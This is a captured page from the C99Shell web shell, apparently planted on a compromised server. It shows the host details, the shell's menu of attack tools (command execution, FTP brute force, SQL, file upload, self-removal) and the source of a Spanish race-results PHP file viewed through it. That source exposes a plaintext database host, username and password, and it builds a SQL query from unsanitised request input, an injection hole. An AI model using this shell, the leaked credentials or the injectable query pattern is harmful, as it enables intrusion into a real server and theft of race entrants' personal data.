!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/matadin2017/Robles2017/   drwxrwxr-x
Free 83.39 GB of 96.73 GB (86.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     VerDorsal.php (7.62 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Ver Datos Corredor</title>
<link rel="stylesheet" href="css/style.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="favicon.ico">
<script>
function goBack2()
    {
    //window.history.go(-2);
    window.location.replace("Participantes.php");
    }
function goBack1()
    {
    window.history.back();
    }
</script>
<style>
    .Etiqueta    {
        font-family: "Times New Roman", Times, serif;
        font-size: 20px;
        font-weight: bold;
        color: #369;        
        }
    .Valor    {
    font-family: "Times New Roman", Times, serif;
    font-size: 20px;
    font-weight: bold;
    color: #333;
        }
    .UpdateKO    {
    font-family: "Times New Roman", Times, serif;
    font-size: 40px;
    font-weight: bold;
    color: #C00;
        }
    .UpdateOK    {
    font-family: "Times New Roman", Times, serif;
    font-size: 40px;
    font-weight: bold;
    color: #093;
        }

</style>
</head>
<?php
//print_r($_REQUEST);//die();
include('globals.php');
if(!isset(
$_REQUEST['Dorsal']))
    {    
?>
<body>
    <div id="Logo" style="margin-left:20px;">
        <a href="./VerCorredor.php"><img src="css/Escudo.png" width="45" height="79" /></a><span class="Logo"><?php echo VarTitle;?></span>
    </div>
    <div id="Contenedor" class="Contenedor">
        <form method="get">
            <table style="margin-left:15px;">
                <tr>
                    <td width="400"><span class="Texto35 Blue Negrita" >Introduzca el Dorsal:</span></td>
                    <td width="400"><input name="Dorsal" id="Dorsal" type="text" size="10" maxlength="10" class="Texto35 Black Negrita"/></span></td>
                </tr>
                
            </table>
        </form>
    </div>
    <script>
        document.getElementById('Dorsal').focus();
    </script>    
<?php        
    
}
else
    {
    
    include(
'Carrusel/class.MySqliDB.php');
    
$ConnectionArray= array('Server'=>'81.4.127.184',
                            
'Usser'=>'matadin2017',
                            
'Pass'=>'p0rt0rp32009',
                            
'Db'=>'matadin2017');
    
$ConnMysql= new MysqliDB($ConnectionArray);
    
//print_r($ConnMysql);
    
$Sql= ("SET NAMES UTF8");
    
$ConnMysql->EnviarQuery($Sql);
    
    if(
strlen($_REQUEST['Dorsal']) == 10)
        {
        
$Sql'';    
        
$Sqlsprintf(    "SELECT IU.`Dorsal`,IU.`Nombre`,IU.`Apellidos`,IU.`Sexo`,IU.`FxNacimiento`,IU.`CorreoElectronico`,IU.`CATEGORIA`,IU.`EDAD`, C.`RFID`,C.`CRONO`,C.`CARRERA`
                        FROM `matadin2017`.`inscripciones_unificada` IU LEFT JOIN `carrerarobles2017`.`clasificacion_unificada`C
                        ON IU.`Dorsal`=C.`DORSAL` WHERE `RFID`= '%s'"
,(int)$_REQUEST['Dorsal']);    
        
//echo $Sql;
        
}
    else
        {
        
$Sqlsprintf(    "SELECT IU.`Dorsal`,IU.`Nombre`,IU.`Apellidos`,IU.`Sexo`,IU.`FxNacimiento`,IU.`CorreoElectronico`,IU.`EDAD`, C.`Categoria`,C.`Carrera`,C.`Crono`,C.`Puesto`,C.`General`
                        FROM `matadin2017`.`inscripciones_unificada` IU LEFT JOIN `matadin2017`.`clasificacion_unificada`C
                        ON IU.`Dorsal`=C.`DORSAL` WHERE IU.`Dorsal`= '%s'"
,$_REQUEST['Dorsal']);    
        }
    
    
$ConnMysql->EnviarQuery($Sql);//echo "<pre>";print_r($ConnMysql);echo "</pre>";
    
$ConnMysql->ResultadoObjetoU();    
    
$NumRows$ConnMysql->MySqliResult->num_rows;
    
?>
<body>

    
<?php    if($NumRows == 1)
        {    
?>
        <table style="margin-left:15px;">
            <tr>
                <td width="300"><span class="Etiqueta">Dorsal:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->Dorsal;?></span></td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Nombre:</span></td>
                <td width="400">
                    <span class="Valor"><?php echo $ConnMysql->ArrayResultado->Nombre;?></span>    
                </td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Apellidos:</span></td>
                <td width="400">
                    <span class="Valor"><?php echo $ConnMysql->ArrayResultado->Apellidos;?></span>
                </td>
            </tr>
            <!--tr>
                <td width="300"><span class="Etiqueta">Sexo:</span></td>
                <td width="400">
                    <span class="Valor"><?php echo $ConnMysql->ArrayResultado->Sexo;?></span>
                </td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Club:</span></td>
                <td width="400"><span class="Valor"><?php  echo $ConnMysql->ArrayResultado->ClubM;?></span></td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Federado:</span></td>
                <td width="400">
                    <select name="Federado" id="Federado">
                        <option value="" class="Valor" ><span class="Valor">...Seleccione Federado</span></option>
                        <option value="No" <?php if($ConnMysql->ArrayResultado->Federado == 'No')echo 'selected="selected"';?> class="Valor" ><span class="Valor">No Federado</span></option>
                        <option value="Si" <?php if($ConnMysql->ArrayResultado->Federado == 'Si')echo 'selected="selected"';?> class="Valor" ><span class="Valor">Federado</span></option>                
                    </select>
                </td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Nº Licencia Federado:</span></td>
                <td width="400"><input name="NumeroLicenciaFederado" id="NumeroLicenciaFederado" type="text" value="<?php echo $ConnMysql->ArrayResultado->NumeroLicenciaFederado;?>" class="Valor" maxlength="20" size="20" /></td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">DNI:</span></td>
                <td width="400"><input name="DNI" id="DNI" type="text" value="<?php echo $ConnMysql->ArrayResultado->DNI;?>" class="Valor" maxlength="10" size="10" /></td>
            </tr>
            
            <tr>
                <td width="300"><span class="Etiqueta">Tel&eacute;fono:</span></td>
                <td width="400"><input name="Telefono" id="Telefono" type="text" value="<?php echo $ConnMysql->ArrayResultado->Telefono;?>" class="Valor" maxlength="60" size="60" /></td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Fecha Nacimiento:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->FxNacimiento;?></span></td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Edad:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->EDAD;?></span></td>
            </tr-->
            
            <tr>
                <td width="300"><span class="Etiqueta">Correo Electr&oacute;nico:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->CorreoElectronico;?></span></td>
            </tr>
            
            <!--tr>
                <td width="300"><span class="Etiqueta">Nº Chip:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->RFID;?></span></td>
            </tr-->
            <tr>
                <td width="300"><span class="Etiqueta">Crono:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->Crono;?></span></td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Carrera:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->Carrera;?></span></td>
            </tr>
            
            <tr>
                <td width="300"><span class="Etiqueta">Clasificaci&oacute;n General:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->General;?></span></td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Categor&iacute;a:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->Categoria;?></span></td>
            </tr>
            <tr>
                <td width="300"><span class="Etiqueta">Clasificaci&oacute;n Categor&iacute;a:</span></td>
                <td width="400"><span class="Valor"><?php echo $ConnMysql->ArrayResultado->Puesto;?></span></td>
            </tr>
        </table>    
<?php    }
    
    else
        {    
?>
        <span class="Texto16 Red left20">DORSAL NO FINALIZADO</span>
<?php        }     ?>  
<?php
    
}    ?>
    </body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0059 ]--